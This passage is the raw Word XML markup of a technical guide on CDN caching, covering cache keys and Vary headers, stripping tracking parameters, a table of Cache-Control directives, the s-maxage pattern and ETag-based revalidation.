    <w:p w14:paraId="44FC891D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1248"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Also uses eviction (LRU/ARC/TinyLFU variants).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27250922" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Not cached (miss — cold content):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52DC30E5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1249"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Content not present at this edge.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="644CAF56" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1249"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Fetched from upstream (shield or origin) on demand.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEF5087" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1249"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Once fetched: stored in SSD cache (and promoted to RAM if accessed frequently).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33F14687" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.2 Cache Key — How Content Is Identified</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2B69B5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Default cache key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E831539" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D22F0F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Method + Host + Path + Query String</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B6415F5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="79AB4B17" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Example: GET|cdn.example.com|/api/products|page=2&amp;sort=price</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B6CB18F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Extended cache key (with Vary):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E48CB2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F66907" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Method + Host + Path + Query String + Vary Headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6527D548" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="442E1DA6" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Example with Vary: Accept-Encoding, Accept-Language:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383448C4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>GET|cdn.example.com|/page|Accept-Encoding:br|Accept-Language:en</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D84A6A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>GET|cdn.example.com|/page|Accept-Encoding:gzip|Accept-Language:fr</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CAB9BBA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>(4 combinations = 4 separate cache entries)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E81F288" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Cache key customization (critical for hit ratio):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A421B94" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Problem: Marketing URLs with tracking parameters:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0528E43F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC8F272" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>/product.jpg?fbclid=abc123   → Cache key A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1409C3AD" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>/product.jpg?utm_source=twitter → Cache key B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A48988" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>/product.jpg                 → Cache key C</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243CFD66" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>All three serve IDENTICAL content but are cached separately!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D20779" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Solution: Configure CDN to strip irrelevant query parameters from cache key:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E75897E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E288D20" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache key includes only: path + [width, height, format] parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BAE31C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Ignores: utm_*, fbclid, gclid, ref, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A784E3" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.3 Cache-Control — The Origin's Instructions to the CDN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A1B887" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The HTTP caching model gives ORIGIN full control over caching behavior:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3830F87F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B9F7BA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache-Control: public, max-age=86400, s-maxage=3600, stale-while-revalidate=60</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735"/>
        <w:gridCol w:w="6615"/>
      </w:tblGrid>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="7037077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61815E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Directive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ACFB71" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00784ED6">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Effect on CDN</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="1620A6F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269CAE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED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556C19" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>CDN may cache this response (even if it has Authorization header)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="13F1B7E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B322AE" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>private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466731" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>CDN must NOT cache (only user's browser may cache)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="77F3749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29622D" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:lastRenderedPageBreak/>
              <w:t>max-age=86400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A82DD7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>Browser caches for 24 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="0068AC5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CD66E7" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>s-maxage=3600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F18ADA" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>CDN caches for 1 hour (overrides max-age for shared caches)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="1D4CD39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A8ECC2" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>no-cache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8FB62E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>CDN may store but must revalidate with origin before every serve</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="4D6D1A0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5CEE6A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>no-store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332DB4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>CDN must not store this response at all</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="3B0E0FA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8C2487" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>must-revalidate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6252C5" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>When stale, CDN MUST revalidate (cannot serve stale even if origin is down)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="1FF984E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7A78F1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>stale-while-revalidate=60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7E8D24" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>CDN may serve stale content for 60s while refreshing in background</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00784ED6" w:rsidRPr="00784ED6" w14:paraId="70FF5E4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6B8DAB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>stale-if-error=300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26C279" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
            <w:r w:rsidRPr="00784ED6">
              <w:t>CDN may serve stale content for 300s if origin returns an error</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FD04D65" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The s-maxage pattern (different TTL for CDN vs. browser):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4535C461" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ABB88EB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Cache-Control: public, max-age=0, s-maxage=3600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47806461" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>This means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2397C23E" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1250"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN caches for 1 hour (serves from edge without hitting origin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="100398AC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1250"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>Browser never caches (always goes to CDN for freshest version).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7504B148" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1250"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:t>When you purge the CDN, the next request gets fresh content immediately (browser didn't cache stale version).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50121D34" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why this pattern is powerful:</w:t>
      </w:r>
      <w:r w:rsidRPr="00784ED6">
        <w:t> You get CDN performance benefits (1-hour edge caching) while retaining the ability to push updates instantly (purge CDN → next request gets fresh content, since browser didn't cache).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F72C14" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>4.4 Cache Freshness, Revalidation, and Staleness</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6262F373" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>The lifecycle of a cached object:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09226A1B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084D53CC" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Time 0: Object cached (fresh). TTL = 3600s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19945F40" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Time 0–3600: Object served directly from cache (FRESH).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C16DF2F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Time 3600: TTL expires. Object is now STALE.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447CEC1C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Time 3600+:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077AC684" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Option A: Serve stale + revalidate in background (stale-while-revalidate)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1E6F5A" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Option B: Hold request, revalidate synchronously, then serve (no-cache behavior)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A2886B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Option C: Evict and fetch fresh from origin (miss)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2458379B" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Conditional revalidation (the bandwidth-saving mechanism):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6759FAC4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>When the CDN needs to check if stale content is still valid:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01F619A8" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5942FD73" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>CDN → Origin:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A020030" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  GET /page HTTP/1.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CE395C" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  If-None-Match: "etag-abc123"     (content hash from original response)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="377B4515" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  If-Modified-Since: Wed, 28 May 2026 10:00:00 GMT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F15F51F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="58696C78" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin response if unchanged:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F731900" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  HTTP/1.1 304 Not Modified         (empty body — saves bandwidth!)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D92F3EF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  ETag: "etag-abc123"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A4F6FB" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Cache-Control: max-age=3600       (reset TTL)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A3EF3F" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6"/>
    <w:p w14:paraId="441E2B96" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t>Origin response if changed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="547B0251" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  HTTP/1.1 200 OK</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E14BBB0" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  ETag: "etag-def456"              (new hash)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C7115BF" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:t xml:space="preserve">  Cache-Control: max-age=3600</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295C0CD1" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  [new content body]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B646BE4" w14:textId="77777777" w:rsidR="00784ED6" w:rsidRPr="00784ED6" w:rsidRDefault="00784ED6" w:rsidP="00784ED6">
      <w:r w:rsidRPr="00784ED6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bandwidth savings:</w:t>
